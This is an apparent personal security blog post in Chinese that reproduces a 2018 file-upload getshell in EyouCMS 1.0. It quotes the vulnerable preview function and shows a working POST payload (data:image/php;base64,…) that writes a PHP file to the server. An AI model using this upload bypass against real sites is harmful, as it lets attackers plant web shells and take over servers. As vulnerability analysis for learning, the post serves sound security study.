

Hu3sky's blog

eyoucms前台getshell复现

Hu3sky's blog

eyoucms前台getshell复现

Word count: 450 / Reading time: 2 min

 2018/08/25   Share

• 
• 
• 
• 
• 

既然自己挖不到getshell的洞，就来复现一下别人的，学习学习思路。

cms

官网：http://www.eyoucms.com/download/
Cms下载地址：http://www.eyoucms.com/eyoucms1.0.zip

漏洞出现位置

页面：http://127.0.0.1/index.php/api/Uploadify/preview
代码位置 application\api\controller\Uploadify.php

漏洞分析

漏洞在第201行的preview函数开始

        //获取 原始数据的只读流
        $src = file_get_contents('php://input');
        //正则判断，图片base64编码数据
        //绕过正则 data:image/php;base64
        if (preg_match("#^data:image/(\w+);base64,(.*)$#", $src, $matches)) {
            $previewUrl = sprintf(
                "%s://%s%s",
                isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] != 'off' ? 'https' : 'http',
                $_SERVER['HTTP_HOST'],$_SERVER['REQUEST_URI']
            );
            //获取路径
            $previewUrl = str_replace("preview.php", "", $previewUrl);
            //获取base64数据
            $base64 = $matches[2];
            //获取base64后缀 此时为php
            $type = $matches[1];

            //判断type是否是jepg，若为jepg则type就为jpg
            //所以构造后缀为php
            //例如：data:image/php;base64。此时type=php
            //而下面判断是$type等于jepg赋值为jpg，后缀完美可外部控制
            if ($type === 'jpeg') {
                $type = 'jpg';
            }
            //设置文件名称
            $filename = md5($base64).".$type"; //这里我们可以控制为php
            //设置文件路径
            $filePath = $DIR.DIRECTORY_SEPARATOR.$filename;

            //判断文件是否存在，如果存在 返回文件路径
            if (file_exists($filePath)) {
                die('{"jsonrpc" : "2.0", "result" : "'.$previewUrl.'preview/'.$filename.'", "id" : "id"}');
            } else {
                //将外部的base64数据解码
                $data = base64_decode($base64);
                //写入文件，生成文件
                file_put_contents($filePath, $data);
                die('{"jsonrpc" : "2.0", "result" : "'.$previewUrl.'preview/'.$filename.'", "id" : "id"}');
            }
        } else {
            die('{"jsonrpc" : "2.0", "error" : {"code": 100, "message": "un recoginized source"}}');
        }
    }
}

此漏洞正则背锅，仅仅以data:image/作为图片，而忽略了data:image/php，即可绕过。

漏洞演示

在 http://127.0.0.1/index.php/api/Uploadify/preview 处，post数据 data:image/php;base64,PD9waHAgcGhwaW5mbygpOw==.即可得到文件路径。用域名+后面部分，即可getshell。

原文作者: Hu3sky

原文链接: http://yoursite.com/2018/08/25/eyouǰ̨getshell/

发表日期: August 25th 2018, 2:03:00 pm

版权声明: 本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

• Next Post
  php-security-calendar-2017
• Previous Post
  Hooskcms 几个小洞

Powered by Hexotheme Archer

本站总访问量次

本站总访问量: :)

CATALOG

1. 1. cms
2. 2. 漏洞出现位置
3. 3. 漏洞分析
4. 4. 漏洞演示



• Archive
• Tag
• Cate

Total : 101

2021

• 01/22Oracle补丁日 ：CVE-2020-14756 漏洞利用及补丁分析
• 01/18CVE-2020-17518/17519：Apache Flink 目录遍历漏洞&路由分析
• 01/042020 总结 & 2021 计划

2020

• 12/11浅析 S2-061
• 10/19Websphere 最新版9.0.5.5 反序列化入口挖掘以及XXE构造
• 04/19Orcale 4月补丁日的几个漏洞以及CVE-2020-2801的简单分析
• 04/08CVE-2020-10204/CVE-2020-10199 Nexus Repository Manager3 分析&以及三个类的回显构造
• 03/20weblogic t3 协议利用与防御
• 03/08CVE-2020-2555 漏洞分析
• 03/06JMX-RMI
• 01/06shiro-1.2.4-rememberMe反序列化分析与基于Commons-Collections3.2.1下的payload构造

2019

• 12/20CVE-2018-1270 Remote Code Execution with spring-messaging 分析
• 10/20Joomla 3.4.6 远程代码执行
• 10/16WebLogic-XMLDecoder反序列化分析
• 10/05Fastjson反序列化漏洞以及多版本补丁分析
• 10/02JAVA XXE
• 09/24Thinkphp多个版本注入分析
• 09/20Thinkphp3个版本数据库操作以及底层代码分析
• 09/13java反序列化由浅入深及JNDI注入理解(二)-JAVA Apache-Commons-Collections
• 09/10Ciscn华北赛区Dropbox题解
• 09/08java反序列化由浅入深及JNDI注入理解(一)-Spring反序列化
• 09/062019护网杯esaypy
• 09/04php-fpm&fast-cgi学习
• 08/24java安全漏洞入门之 s2-001
• 08/24java安全漏洞入门之 s2-003&s2-005
• 08/21.user.ini后门
• 08/15laravel5.7-unserialize-RCE
• 08/08De1CTF Ssrfme 详解
• 08/06深入理解浏览器编码
• 05/13bypassUAC_via_comhijacking
• 05/07JavaScript Prototype 污染攻击之 Code-Breaking-TheJS篇
• 05/06JavaScript Prototype 污染攻击之 基础篇
• 04/24内网中的PowerSploit
• 04/23第12届全国大学生信息安全竞赛Web题解
• 04/22DDCTF部分 Write up
• 04/21How To Use Cobalt Strike(备忘录)
• 04/02Content Security Policy&Bypass
• 04/01跨域相关问题
• 03/27Windows安全下的一些网络认证
• 03/21三层内网搭建&MSF正反向代理穿透
• 02/28WordPress5.0 RCE 分析
• 02/22About OAuth2.0
• 02/20Metinfo 6.1.2 SqlInjection
• 02/16初识Redis未授权访问
• 02/15nullcon ctf 部分web
• 02/1435c3-POST 学习
• 02/11Pwnhub Pink friend 学习
• 02/09LCTF-babyphp's revenge
• 02/07HCTF2018 部分Web
• 01/31从两道CTF实例看python格式化字符串漏洞
• 01/29DiscuzX 3.4 前台SSRF
• 01/28齐博CMSv7审计
• 01/28从SCTF看nginx配置问题
• 01/23Code-Breaking Puzzles
• 01/210ctf-ezdoor
• 01/18Tp5.0.0-5.0.23 RCE学习
• 01/11Thinkphp5.* getshell 分析
• 01/11PHPCMS2008_getshell
• 01/0735C3 CTF 部分解题记录（junior）

2018

• 12/25SWPUCTF_WP
• 12/23寒假学习计划
• 10/06destoon前台getshell复现
• 09/12YXCMS 1.4.7
• 09/12YXCMS 1.4.7 - Arbitrary file deletion
• 09/07反序列化之phar://学习
• 09/06ssh后门
• 09/03Git
• 09/01python装饰器
• 08/30hackme CTF 记录
• 08/25php-security-calendar-2017
• 08/25eyoucms前台getshell复现
• 08/23Hooskcms 几个小洞
• 08/18Hack the ch4inrulz of Vulnhub
• 08/18Bugku sql注入2
• 08/07Vulnhub\|Cyberry靶机
• 07/17java学习笔记
• 07/05暑假学习计划
• 07/03Bob 1.0.1
• 06/29浅谈XML实体注入漏洞
• 06/22Vulnhub Bsides靶机
• 06/11Linux
• 06/06超级玛丽靶机渗透测试笔记
• 06/04jarvisoj WP
• 05/25域渗透练习
• 05/23Empire使用总结
• 05/09ctf一道题目。php反序列化学习
• 05/03记一次kali渗透测试靶机
• 04/25[Untitled Post]
• 04/24i春秋WP
• 04/24实验吧WP
• 04/20scrapy爬虫实例
• 04/17webug wp
• 04/15线下赛总结
• 04/101个月学习计划
• 04/10Scrapy笔记
• 04/01rnpnet tiki-calendar.php页面存在代码执行漏洞
• 03/28cookie与session的笔记
• 03/23VehicleWorkshop上传漏洞本地复现
• 03/16Redtiger题目
• 03/15会员日Pwnhub题目的复现
• 01/13Flask_SSTI



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true

CTF writeup 规划 学习计划 渗透测试 浏览器安全 java安全 漏洞分析 备忘录 代码审计 write-up 学习笔记 Linux Arbitrary-File-Upload CVE-Request sql注入 http协议 内网渗透 Empire git php反序列化 JavaScript python scrapy php魔法 xxe 代码执行 内网 后门 线下赛 前端 域渗透

